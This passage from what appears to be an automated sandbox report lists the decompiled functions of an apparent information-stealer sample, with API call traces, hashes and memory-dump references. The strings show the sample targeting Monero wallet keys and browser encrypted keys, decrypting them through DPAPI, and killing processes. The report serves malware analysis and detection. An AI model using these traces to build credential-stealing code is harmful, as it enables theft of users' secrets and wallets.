                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: 1e2f70c9d600e7a352f251e61f071ba69127b109c740b3846cb7883750d1f9d5
                      • Instruction ID: a13e2dc564cb6073e5063b7d6d3031fdea9b6a21abfe3a4b3dd8de1ba653f8f2
                      • Opcode Fuzzy Hash: 1e2f70c9d600e7a352f251e61f071ba69127b109c740b3846cb7883750d1f9d5
                      • Instruction Fuzzy Hash: 27314FB1C01268ABDB16EB91DC81FDDB779AF04300F405299F2096A1D2DF746B49CF5A
                      Function 003E87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003F0E28,00000000,?), ref: 003E882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E8836
                      • wsprintfA.USER32 ref: 003E8850
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: deacd978e09322d41cafbefcbefa345d486ddb988474e8165e06e57186eb4e45
                      • Instruction ID: 56a6441477a1b0e152f06d659135d639272c65f55353ae4a5d6c13faaca4898e
                      • Opcode Fuzzy Hash: deacd978e09322d41cafbefcbefa345d486ddb988474e8165e06e57186eb4e45
                      • Instruction Fuzzy Hash: 18211DB1A41208ABDB04DFD8DD45FEEBBB9FB48711F148219F605A7280C779A901CBA1
                      Function 003E8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003E951E,00000000), ref: 003E8D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E8D62
                      • wsprintfW.USER32 ref: 003E8D78
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: ca77c9963b06cba46a6c3cbde508855099385d58d0570267fd7e663fed9361c6
                      • Instruction ID: 92bed7e17c6bac2d0c7629e4949215004895ee98948c0517e12da1989a2c8c19
                      • Opcode Fuzzy Hash: ca77c9963b06cba46a6c3cbde508855099385d58d0570267fd7e663fed9361c6
                      • Instruction Fuzzy Hash: 0EE08CB4A41208BBC700DBD8DC0AEA977B8EB04702F048195FE0A97280DA719E008B92
                      Function 003DA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003DA2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 003DA3FF
                      • lstrlen.KERNEL32(00000000), ref: 003DA6BC
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 003DA743
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: ea1eae23ea9949edb825b4c2cfa84280f94c6e4ad8e3d2a5385399409cb28ed4
                      • Instruction ID: 12e002d004274c314367aa83cafb7da0983db12efb0fdaa0df51e35918190ccc
                      • Opcode Fuzzy Hash: ea1eae23ea9949edb825b4c2cfa84280f94c6e4ad8e3d2a5385399409cb28ed4
                      • Instruction Fuzzy Hash: 47E134728105689BDB06FBA5DC92EEE7739AF14300F518259F1177A0D2EF307A09CB62
                      Function 003DD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003DD481
                      • lstrlen.KERNEL32(00000000), ref: 003DD698
                      • lstrlen.KERNEL32(00000000), ref: 003DD6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 003DD72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 171657dc5307ad55c22eabff9238ada8d2e08a6542506193969c5ddc1cb7de75
                      • Instruction ID: c0d3215ff3c6592be28be3b618029331c35d7dab2c3ac74a1fe4ecd31411b175
                      • Opcode Fuzzy Hash: 171657dc5307ad55c22eabff9238ada8d2e08a6542506193969c5ddc1cb7de75
                      • Instruction Fuzzy Hash: 3A9157728105589BDB06FBA1DC92EEE7739AF14300F518269F5077A0D2EF347A09DB62
                      Function 003DD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003DD801
                      • lstrlen.KERNEL32(00000000), ref: 003DD99F
                      • lstrlen.KERNEL32(00000000), ref: 003DD9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 003DDA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 950e65f6cd07f20e3b34f63c5b2db7ff7ef8cb58e01ebcb9defa2664d895fb3b
                      • Instruction ID: e60005e1982f9f2d38a405bfd546a087c137f34ddc165db4a54bdd4ecbb9a71d
                      • Opcode Fuzzy Hash: 950e65f6cd07f20e3b34f63c5b2db7ff7ef8cb58e01ebcb9defa2664d895fb3b
                      • Instruction Fuzzy Hash: EA8158728105589BDB06FBE1DC92EEE7739AF14300F414629F507AA0D2EF347A09DB62
                      Function 003DF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003F1580,003F0D92), ref: 003DF54C
                      • lstrlen.KERNEL32(00000000), ref: 003DF56B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                      • String ID: ^userContextId=4294967295$moz-extension+++
                      • API String ID: 998311485-3310892237
                      • Opcode ID: f4aacaa9ac26fd37e1cd116857a20d4e4ff1e7e9531572c4c69abd78941035ef
                      • Instruction ID: 71b29bc006accdda5334c2d1f6a345a0c992a8e85ed5511579d2cbf388a17e90
                      • Opcode Fuzzy Hash: f4aacaa9ac26fd37e1cd116857a20d4e4ff1e7e9531572c4c69abd78941035ef
                      • Instruction Fuzzy Hash: 8E513172D00658AADB05FBA1EC92DED7779AF54300F418629F4066B1D1EF347A09CBA2
                      Function 003E3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: e832eb58a3813b3ea20d541fe5566c42ec384652befca2c268eb36548b5b8d84
                      • Instruction ID: 7d7a4f9208b40373425c16f43088933e347c0dde01fe1b54f571ce434a22d5f9
                      • Opcode Fuzzy Hash: e832eb58a3813b3ea20d541fe5566c42ec384652befca2c268eb36548b5b8d84
                      • Instruction Fuzzy Hash: 7A416171D10258ABCB05EFF6C885AFEB778AF44304F008618E5167B2D1DB75AA05CFA2
                      Function 003D9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003D9D39
                        • Part of subcall function 003D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9AEF
                        • Part of subcall function 003D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003D4EEE,00000000,?), ref: 003D9B01
                        • Part of subcall function 003D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9B2A
                        • Part of subcall function 003D9AC0: LocalFree.KERNEL32(?,?,?,?,003D4EEE,00000000,?), ref: 003D9B3F
                        • Part of subcall function 003D9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003D9B84
                        • Part of subcall function 003D9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 003D9BA3
                        • Part of subcall function 003D9B60: LocalFree.KERNEL32(?), ref: 003D9BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 0d99818ead7e98c5937be3d34884a4accb338d18cf5d3af8b3acb656f7d8bb26
                      • Instruction ID: 2eb85a44b66c647379e7ab7bd6e520ca6823d2f7ebdd7e694bc6b3b10007d351
                      • Opcode Fuzzy Hash: 0d99818ead7e98c5937be3d34884a4accb338d18cf5d3af8b3acb656f7d8bb26
                      • Instruction Fuzzy Hash: 57314FB6D1020DABCF05DFE4EC85BEEB7B9AF48304F14451AE905A7245EB349A04CBA1
                      Function 003E94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 003E94EB
                        • Part of subcall function 003E8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003E951E,00000000), ref: 003E8D5B
                        • Part of subcall function 003E8D50: RtlAllocateHeap.NTDLL(00000000), ref: 003E8D62
                        • Part of subcall function 003E8D50: wsprintfW.USER32 ref: 003E8D78
                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 003E95AB
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 003E95C9
                      • CloseHandle.KERNEL32(00000000), ref: 003E95D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
